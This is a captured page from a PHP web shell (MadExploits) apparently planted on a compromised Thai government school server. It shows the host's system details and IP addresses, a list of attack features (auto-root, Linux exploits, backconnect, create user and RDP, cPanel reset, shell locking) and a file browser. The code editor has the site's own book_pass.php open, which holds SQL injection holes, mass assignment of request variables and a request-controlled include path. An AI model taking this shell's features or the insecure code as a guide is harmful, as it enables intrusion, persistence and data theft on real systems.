Linux ns8.secondary29.go.th 2.6.32-754.28.1.el6.x86_64 #1 SMP Wed Mar 11 18:38:45 UTC 2020 x86_64
Apache/2.2.15 (CentOS)
: 122.154.134.11 | : 122.154.134.9
Cant Read [ /etc/named.conf ]
5.6.40
apache
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
amss /
modules /
idocument /
[ HOME SHELL ]
Name
Size
Permission
Action
fonts
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
install
[ DIR ]
drwxr-xr-x
main
[ DIR ]
drwxr-xr-x
manual
[ DIR ]
drwxr-xr-x
tcpdf
[ DIR ]
drwxr-xr-x
upload_files
[ DIR ]
drwxr-xr-x
add.php
16.08
KB
-rw-r--r--
book_pass.php
17.14
KB
-rw-r--r--
book_pass_form_comment1.php
5.19
KB
-rw-r--r--
book_pass_form_comment2.php
6.49
KB
-rw-r--r--
book_pass_form_comment3.php
2.72
KB
-rw-r--r--
css.css
1.06
KB
-rw-r--r--
default.php
216
B
-rw-r--r--
detail.php
8.11
KB
-rw-r--r--
display.php
9.25
KB
-rw-r--r--
docprint.php
7.22
KB
-rw-r--r--
document-detail.php
8.57
KB
-rw-r--r--
edit.php
20
KB
-rw-r--r--
idocument.sql
6.22
KB
-rw-r--r--
index.php
7.5
KB
-rw-r--r--
menu.php
3.13
KB
-rw-r--r--
menu_mobile.php
898
B
-rw-r--r--
save.php
4.91
KB
-rw-r--r--
time_inc.php
6.03
KB
-rw-r--r--
view.php
9.12
KB
-rw-r--r--
viewlist.php
7.88
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : book_pass.php
<?php /** ensure this file is being included by a parent file */ defined( '_VALID_' ) or die( 'Direct Access to this location is not allowed.' ); require_once "modules/$_REQUEST[option]/time_inc.php"; foreach($_REQUEST as $key=>$value) { $$key=$value; } unset($_SESSION['delegate']); if(!isset($_SESSION['delegate'])){ $delegate = "SELECT * FROM delegate_main WHERE person_id = '".$_SESSION['login_user_id']."' AND (CURDATE() >=start AND CURDATE() <=finish)"; $query_delegate = mysqli_query($connect, $delegate); if($query_delegate->num_rows > 0){ $_SESSION['delegate']='TRUE'; }else{ $_SESSION['delegate']=''; } }else{ $_SESSION['delegate']=''; } //echo $delegate; //print_r($_SESSION); $sql = "Select * From person_main Where person_id = '". $_SESSION['login_user_id'] ."' "; $dbquery_permission = mysqli_query($connect,$sql); $result_permission = mysqli_fetch_array($dbquery_permission); $_SESSION['position_code'] = $result_permission['position_code']; $sql_idocument_status = "SELECT * FROM `idocument_status`"; $query_idocument_status = mysqli_query($connect, $sql_idocument_status); $arrComment = array(); while($data_idocument_status = mysqli_fetch_assoc($query_idocument_status)){ $arrComment[$data_idocument_status['bookstatusid']] = $data_idocument_status['bookstatusname']; } $perpage = 10; if (isset($_GET['page'])) { $page = $_GET['page']; } else { $page = 1; } $start = ($page - 1) * $perpage; if(!isset($_REQUEST['bookto_id'])){ $bookto_id = ''; } if(isset($_REQUEST['commentLevel'])){ //if($commentLevel ==2){ $comment_position = isset($_REQUEST['typecmd'])?$_SESSION['login_userposition']." ".$_REQUEST['typecmd']."\n".$_SESSION['office_name']:$_SESSION['login_userposition']; if($commentLevel !=""){ //print_r ($_SESSION); $sqlCHK = "Select * From idocument_comment where document_id= '$id' and person_comments_id ='". $_SESSION['login_user_id'] ."'"; //echo $sqlCHK; if(mysqli_num_rows(mysqli_query($connect, $sqlCHK))==0){ $fullname_comment = $_SESSION['login_prename'].$_SESSION['login_name']." ".$_SESSION['login_surname']; $sqlComment = "Insert INTO idocument_comment(document_id, rec_id, person_comments_id,person_comments_name, person_comments_position, comments_select, comments_etctxt, comments_status) Values('$id', md5('$id'), '". $_SESSION['login_user_id'] ."', '$fullname_comment','". $comment_position ."', '".implode(', ',$comment1)."' , '' , '$commentLevel');"; ////////////////////UPDATE STATUS SNDTO $sqlUpdateStatus = "Update idocument_sendto SET status = '1' WHERE document_id ='$id' AND person_id ='".$_SESSION['login_user_id']."'"; mysqli_query($connect, $sqlUpdateStatus); ////////////////////UPDATE STATUS SNDTO //echo $sqlComment;//$commentETCtxt //echo json_encode($comment1); //print_r($comment1); mysqli_query($connect, $sqlComment); //echo "<br>".$sqlComment; $rec_id = md5('$id'). $_SESSION['login_user_id']; $sqlSento = "Insert INTO idocument_sendto(document_id, rec_id, person_id,document_from) Values('$id', '$rec_id', '$bookto_id', '$document_from');"; mysqli_query($connect, $sqlSento); //echo "<br>".$sqlSento; }else{ $sqlUpdateComment = "UPDATE idocument_comment SET comments_select='".implode(', ',$comment1)."', comments_etctxt='', person_comments_position='$comment_position' WHERE document_id ='$id' AND person_comments_id ='".$_SESSION['login_user_id']."'"; mysqli_query($connect, $sqlUpdateComment); $sqlSento = "Update idocument_sendto SET person_id = '$bookto_id' where document_id ='$id' and document_from = '".$_SESSION['login_user_id']."'"; mysqli_query($connect, $sqlSento); ////////////////////UPDATE STATUS SNDTO $sqlUpdateStatus = "Update idocument_sendto SET status = '1' WHERE document_id ='$id' AND person_id ='".$_SESSION['login_user_id']."'"; mysqli_query($connect, $sqlUpdateStatus); ////////////////////UPDATE STATUS SNDTO } } //if($_REQUEST['commentLevel']=='3'){ $updateStatus = "UPDATE idocument_main SET book_status = '$commentLevel' WHERE id ='$id'"; //echo $updateStatus; mysqli_query($connect, $updateStatus); //} } ?> <style type="text/css"> #content td{ font-family: "Sarabun"; font-size: 16pt; } </style> <br> <?php if(!isset($_GET['action'])){ ?> <center> <font color='#006666' size='3'><strong>รายการบันทึกเสนอ</strong></font> <?php //ส่วนของการแยกหน้า $sql="select * from `idocument_sendto` where person_id ='$_SESSION[login_user_id]' ORDER BY document_id"; //echo $sql; $dbquery = mysqli_query($connect,$sql); $num_rows = mysqli_num_rows($dbquery ); $pagelen=15; // 1_กำหนดแถวต่อหน้า $url_link="option=idocument&task=book_pass"; // 2_กำหนดลิงค์ฺ $totalpages=ceil($num_rows/$pagelen); if(!(isset($_REQUEST['page']))){ $_REQUEST['page']=""; } if($_REQUEST['page']==""){ $page=$totalpages; if($page<2){ $page=1; } } else{ if($totalpages<$_REQUEST['page']){ $page=$totalpages; if($page<1){ $page=1; } } else{ $page=$_REQUEST['page']; } } $start=($page-1)*$pagelen; if(($totalpages>1) and ($totalpages<10)){ echo "<div align=center><nav aria-label=\"page navigation\">"; echo "<ul class=\"pagination pagination-sm justify-content-center\">"; for($i=1; $i<=$totalpages; $i++) { if($i==$page){ echo "<li class=\"page-item active\"><a href='#'>$i</a></li>"; } else { echo "<li class=\"page-item\"><a href=$PHP_SELF?$url_link&page=$i>$i</a></li>"; } } echo "</ul></nav></div>"; } if($totalpages>=10){ if($page <=5){ $e_page=10; $s_page=1; } if($page>5){ if($totalpages-$page>=6){ $e_page=$page+4; $s_page=$page-4; } else{ $e_page=$totalpages; $s_page=$totalpages-9; } } echo "<div align=center><nav aria-label=\"page navigation\">"; echo "<ul class=\"pagination pagination-sm justify-content-center\">"; if($page!=1){ $f_page1=$page-1; echo "<li class=\"page-item\"><a href=\"$PHP_SELF?$url_link&page=1\">First</a></li>"; echo "<li class=\"page-item\"><a href=\"$PHP_SELF?$url_link&page=$f_page1\">Previous</a></li>"; } else { echo "<li class=\"page-item disabled\"><a class = 'disabled'>First</a></li>"; echo "<li class=\"page-item disabled\"><a class = 'disabled'>Previous</a></li>"; } for($i=$s_page; $i<=$e_page; $i++){ if($i==$page){ echo "<li class=\"page-item active\"><a >$i</a></li>"; } else { echo "<li class=\"page-item\"><a href=$PHP_SELF?$url_link&page=$i>$i</a></li>"; } } if($page<$totalpages) { $f_page2=$page+1; echo "<li class=\"page-item\"><a href=$PHP_SELF?$url_link&page=$f_page2>Next</a></li>"; echo "<li class=\"page-item\"><a href=$PHP_SELF?$url_link&page=$totalpages>Last</a></li>"; } else { echo "<li class=\"page-item disabled\"><a class = 'disabled'>Next</a></li>"; echo "<li class=\"page-item disabled\"><a class = 'disabled'>Last</a></li>"; } echo "</ul></nav></div>"; } //จบแยกหน้า ?> </center> <table border="1" width="98%" align="center"> <thead> <tr bgcolor=#99ccff> <td align="center" style ="font-weight: bold">ที่</td> <td align="center" style ="font-weight: bold">เลขที่</td> <td align="center" style ="font-weight: bold">เรื่อง</td> <td align="center" style ="font-weight: bold">ลงวันที่</td> <td align="center" style ="font-weight: bold">เรียน</td> <td align="center" style ="font-weight: bold">ผู้บันทึก</td> <td align="center" style ="font-weight: bold">ลงความเห็น/<br />สั่งการ</td> <!--th>สถานะ</th--> </tr> </thead> <tbody> <?php $sql = "SELECT * FROM `idocument_sendto` WHERE person_id = '". $_SESSION['login_user_id'] ."' ORDER BY status DESC, document_id ASC limit $start,$pagelen "; $dbquery = mysqli_query($connect,$sql); $N =(($page-1)*$pagelen)+0; //*เกี่ยวข้องกับการแยกหน้า $row =(($page-1)*$pagelen)+0; //*เกี่ยวข้องกับการแยกหน้า if($dbquery){ $i = 0; while($datarow = mysqli_fetch_assoc($dbquery)){ $row++; $N++; $sqlID = "SELECT * FROM `idocument_main` where id = '". $datarow['document_id'] ."'"; //echo $sqlID; $dbqueryID = mysqli_query($connect,$sqlID); $dataRowDetail = mysqli_fetch_assoc($dbqueryID); $bgcolor = (($i%2)==1)?" class='even'":" class='odd'"; $i++; // เช็คสถานะการลงความเห็น $sql_chk_comment = "SELECT * FROM `idocument_comment` Where document_id = '".$datarow['document_id']."' AND person_comments_id = '". $_SESSION['login_user_id'] ."' "; $dbquery_chk_comment = mysqli_query($connect,$sql_chk_comment); if(mysqli_num_rows($dbquery_chk_comment)<=0){ $comment_chk = ' data-toggle="tooltip" data-placement="top" title="บันทึกข้อความรอลงความเห็น/สั่งการ"'; $img_chk = '<b>'.$dataRowDetail['subject'].'</b> <img src="images/icon_new.gif" border = "0" alt="บันทึกข้อความรอลงความเห็น/สั่งการ" title="บันทึกข้อความรอลงความเห็น/สั่งการ" data-toggle="tooltip" data-placement="top" >'; }else{ $comment_chk =""; $img_chk = $dataRowDetail['subject'].'<img src="images/b_usrcheck.png" border = "0" alt="ลงความเห็น/สั่งการแล้ว" title="ลงความเห็น/สั่งการแล้ว">'; } /**/ ?> <tr <?=$bgcolor?> > <td height=25 align=center><?php echo $N;?></td> <td align=center><?php echo $dataRowDetail['book_no'];?></td> <td><?php echo $img_chk;?></td> <td align=center><?php echo thai_dateBook($dataRowDetail['book_date']);?></td> <td><?php echo $dataRowDetail['book_to'];?></td> <td><?php echo $dataRowDetail['officer_name'];?></td> <td align="center"><a href="?option=<?php echo $_REQUEST['option'];?>&task=book_pass&action=comment&id=<?php echo $dataRowDetail['id'];?>" ><span class='glyphicon glyphicon-list-alt' aria-hidden='true'></span></a></th> </tr> <?php $row++; } echo (($row==0)?"<tr><td colspan=7 align=center><font size=3 color=red>-- ไม่มีรายการบันทึกเสนอ --</font></td></tr>":""); } ?> </tbody> </table> <?php } ?> <?php if(isset($_GET['action'])){ ?> <div class="col-sm-8" style="font-family:'Sarabun';font-size: 16pt; " id="content"> <?php $id = $_REQUEST['id']; $sql = "Select * From idocument_main where id = $id"; $dbquery = mysqli_query($connect,$sql); $dataDisplay = mysqli_fetch_assoc($dbquery); ?> <table width="100%" border="0" style="font-family:'Sarabun';font-size: 16pt;"> <tr> <td width="60"> <img = src="./modules/<?php echo $_REQUEST['option']; ?>/main/krut.png" border="0" width="60"> </td> <td align = "center" valign="middle" colspan="3"> <strong>บันทึกข้อความ</strong> </td> </tr> <tr> <td colspan="4"> <p> <strong>ส่วนราชการ </strong> <?php echo $dataDisplay['workgroup_txt'];?> </p> </td> </tr> <tr> <td valign="middle" colspan="2"> <p> <strong>ที่ </strong><?php echo $dataDisplay['book_no'];?> </p> </td> <td valign="middle" align="center" colspan="2"> <p> <strong>วันที่ </strong><?php echo thai_dateBook($dataDisplay['book_date']);?> </p> </td> </tr> <tr> <td colspan="4" style="border-bottom: 1px solid"> <p> <strong>เรื่อง</strong> <?php echo $dataDisplay['subject'];?> </p> </td> </tr> <tr> <td colspan="4" style=""> <p><br> <strong>เรียน </strong><?php echo $dataDisplay['book_to'];?> </p> </td> </tr> <?php //Check Ref doc $sql = "Select * From idocument_files Where document_id = '$id' and docType = 'ref'"; $result = mysqli_query($connect,$sql); if($result->num_rows > 0){ $i = 1; echo' <tr> <td valign="top" width ="120"><strong>อ้างถึง</strong> </td> <td colspan="3" style=""> <p>'; while ($row = $result->fetch_assoc()) { if(!empty($row['file_name'])){ if(empty($row['file_des'])){ echo $i.". <a target='_blank' href='".$row['file_name'] ."'>เอกสารหนังสืออ้างถึง</a><br>"; }else{ echo $i.". <a target='_blank' href='".$row['file_name'] ."'>".$row['file_des']."</a><br>"; } }else{ echo $i.". ". $row['file_des']."<br>"; } $i++; } echo' </p> </td> </tr>'; } ?> <?php //Check Ref doc $sql = "Select * From idocument_files Where document_id = '$id' and docType = 'attach'"; $result = mysqli_query($connect,$sql); if($result->num_rows > 0){ $i = 1; echo' <tr> <td valign="top" width ="120"><strong>สิ่งที่ส่งมาด้วย</strong> </td> <td colspan="3" style=""> <p>'; while ($row = $result->fetch_assoc()) { if(!empty($row['file_name'])){ if(empty($row['file_des'])){ echo $i.". <a target='_blank' href='".$row['file_name'] ."'>เอกสารสิ่งที่ส่งมาด้วย</a><br>"; }else{ echo $i.". <a target='_blank' href='".$row['file_name'] ."'>".$row['file_des']."</a><br>"; } }else{ echo $i.". ". $row['file_des']."<br>"; } $i++; } echo' </p> </td> </tr>'; } ?> <tr> <td colspan="4" style=""> <p> <?php echo nl2br($dataDisplay['content1']);?> </p> </td> </tr> <tr> <td colspan="4" style=""> <p> <?php echo nl2br($dataDisplay['content2']);?> </p> </td> </tr> <tr> <td colspan="4" style=""> <p> <?php echo nl2br($dataDisplay['content3']);?> </p> </td> </tr> <tr> <td colspan="3" style="text-align:center;"> <?php // Add signature $sigFile = "./modules/person/signature/". $dataDisplay['officer'] .".png"; if(file_exists($sigFile)){ echo "<img src='". $sigFile ."' border='0' width='150'>"; } ?> <br> (<?php echo $dataDisplay['officer_name'];?>) <br> <?php echo $dataDisplay['officer_position'];?> <br> <?php echo thai_dateBook($dataDisplay['book_date']);?> </td> <td style=""></td> </tr> </table> <br /><br /> <?php $sqlComment = "Select * From idocument_comment where document_id = $id Order by id"; //echo $sqlComment; $dbqueryComment = mysqli_query($connect,$sqlComment); if(mysqli_num_rows($dbqueryComment)==0){ }else{ while($commentData = mysqli_fetch_array($dbqueryComment)){ $fullname = '( '. $commentData['person_comments_name'].' )<br> '. nl2br($commentData['person_comments_position']).'<br> '. thai_dateBook($commentData['comments_date']); //'. thai_dateBook(date("Y-m-d",$commentData['comments_date'])); echo "<div class='col-sm-4'>"; //echo $comment; $data_comment = explode(", ", $commentData['comments_select']); $comment =""; foreach($data_comment as $value){ @$comment .=($value=="")?"":("-". (($arrComment[$value])?$arrComment[$value]:$value)."<br />"); } echo $comment; //echo str_replace(",","<br />", $commentData['comments_select']); echo "<p align=center style='font-family:\"Sarabun\";font-size: 14pt;'>"; // Add signature $sigFileComment = "./modules/person/signature/". $commentData['person_comments_id'] .".png"; //$sigFile = "./signature/3700300113267.png"; if(file_exists($sigFileComment)){ echo "<img src='". $sigFileComment ."' border='0' width='150'>"; } echo "<br>".$fullname; echo "</p>"; echo "</div>"; } } ?> </div> <div class="col-sm-4" style = "position:fixed; bottom: 0; right:0;" > <div class="row"> <?php if($_SESSION['position_code'] == 1){ require_once "modules/$_REQUEST[option]/book_pass_form_comment3.php"; }elseif ($_SESSION['position_code'] == 2 OR $_SESSION['delegate']=='TRUE') { require_once "modules/$_REQUEST[option]/book_pass_form_comment2.php"; }else{ require_once "modules/$_REQUEST[option]/book_pass_form_comment1.php"; } ?> </div> </div> <?php } //print_r($_SESSION); ?> <script> $(function () { $('[data-toggle="tooltip"]').tooltip() }) </script>
Close
